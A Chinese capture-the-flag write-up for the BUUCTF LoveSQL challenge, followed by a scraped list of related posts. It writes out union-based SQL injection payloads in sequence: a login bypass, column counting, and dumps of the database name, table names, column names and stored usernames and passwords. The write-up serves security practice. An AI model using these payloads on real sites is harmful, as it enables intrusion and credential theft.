BUUCTF [极客大挑战 2019]LoveSQL 1
#和- - 表示注释,url中的#号是用来指导浏览器动作的,对服务器端无用。所以http请求中不包括#,因此使用#无法表示注入,- -(空格)在传输过程中空格会被忽略,导致无法注释
可以使用–+的方式+会被解释成空格,也可以–%20或者#可以写成%23
首先是用万能密码尝试
有成功的返回,试着看看有多少字段
?username=1’ order by 4%23&password=123有错误返回
获取回显点位
?username=1’ union select 1,2,3%23&password=123
得到2和3,接着爆数据库名
?username=1’ union select 1,database(),3%23&password=123
有了库名再爆表名
?username=1’ union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=123
可以看到是有两个表,第二个看着更符合要求,接着爆该表的列名
?username=1’ union select 1,database(),group_concat(column_name) from information_schema.columns where table_name=‘l0ve1ysq1’%23&password=123
将3个字段数据显示出来
?username=1’ union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=123
向右查找即可得到flag
BUUCTF [极客大挑战 2019]LoveSQL 1相关推荐
- BUUCTF WEB [极客大挑战 2019]LoveSQL
BUUCTF WEB [极客大挑战 2019]LoveSQL 进入靶机后尝试万能密码登录 admin 123' or '1'='1 获得flag Login Success! Hello admin! ...
- BUUCTF Web [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http
目录 [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http [GXYCTF2019]Pin ...
- BUUCTF [极客大挑战 2019] PHP
BUUCTF [极客大挑战 2019] PHP 启动靶机,打开页面: 提示为备份,尝试使用脚本扫描备份文件: Python备份文件扫描脚本参考本篇文章 判断应该存在备份文件:www.zip 下载得到源 ...
- buu [极客大挑战 2019]LoveSQL 1
buu [极客大挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看. 进去后是这样: 用户名输入1和1'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是Ma ...
- BUUCTF——[极客大挑战 2019]Havefun 1
这道题是19年的极客挑战的题,这道题整体来说,额,很简单,而且这个猫猫感觉好乖哦~!好了,进入环境 进入环境后可以看见这个界面,啧,说实话感觉没啥用,因为什么有用的价值都没有,所以老规矩,看一下它的源 ...
- [BUUCTF][极客大挑战 2019]Http
思路 浏览网站发现没什么地方可以点的,那就检查元素发现可疑路径 添加Referer头 修改UA 添加XFF头 总结 在CTF中修改http头的操作常有BUUCFT另一题,常用到的值 X-Forward ...
- buuctf [极客大挑战 2019]Http1
目录 知识点补充: 请求行 请求头 请求体 解题过程 知识点补充: 这道题,主要是对于http请求报文的考察.(参考(37条消息) http请求报文详解_石硕页的博客-CSDN博客_http请求报文) ...
- BUUCTF-WEB:[极客大挑战 2019]LoveSQL 1
工具:Firefox,hackbar 这是一道非常常规的SQL的union联合注入的例题 步骤: union联合注入过程 第一步.测试注入点(一些小tips:利用引号,and 1=1, or 1=1之 ...
- [极客大挑战 2019]LoveSQL
顶端の告诫:用 sqlmap 是没有灵魂的 尝试万能密码(其实没卵用) 'or 1=1 # 任意密码 这道题是常规的sql注入,测注入点.查字段数.爆库.爆字段值.爆表.组合拳 字段数: 1' ord ...
最新文章
- JAVA入门级教学之(多态)
- 中秋主题html,中秋节活动主题标语
- 计算机上网络接口层,2016计算机专业知识:TCP/IP 各层功能
- matlab期中考试卷,湖南大学matlab期中考试试卷分析
- 华为盒子显示未连接服务器,华为盒子 连接服务器地址
- webservice学习wsdl解读(2)
- [bzoj5369][状压DP]最大前缀和
- 基于变量推理的知识图路径推理分析
- R语言:Newton法、似然函数
- 戴尔计算机更新程序,戴尔电脑如何更新显卡驱动 其实很简单-电脑显卡怎么升级...
- PHP:firebase/php-jwt生成jwt和验证
- Dissect Eclipse Plugin Framework
- 摩拜+小程序,让单车变得“触手可骑”
- Windows 10 系统精简方案参考
- 机器学习(周志华)-支持向量机课后习题:
- eWebEditor漏洞 [转]
- Spring cloud 多种限流方案
- 数据分析让网络推广事半功倍
- 难道爱一个人有错吗 郑源
- MultipleOutputFormat和MultipleOutputs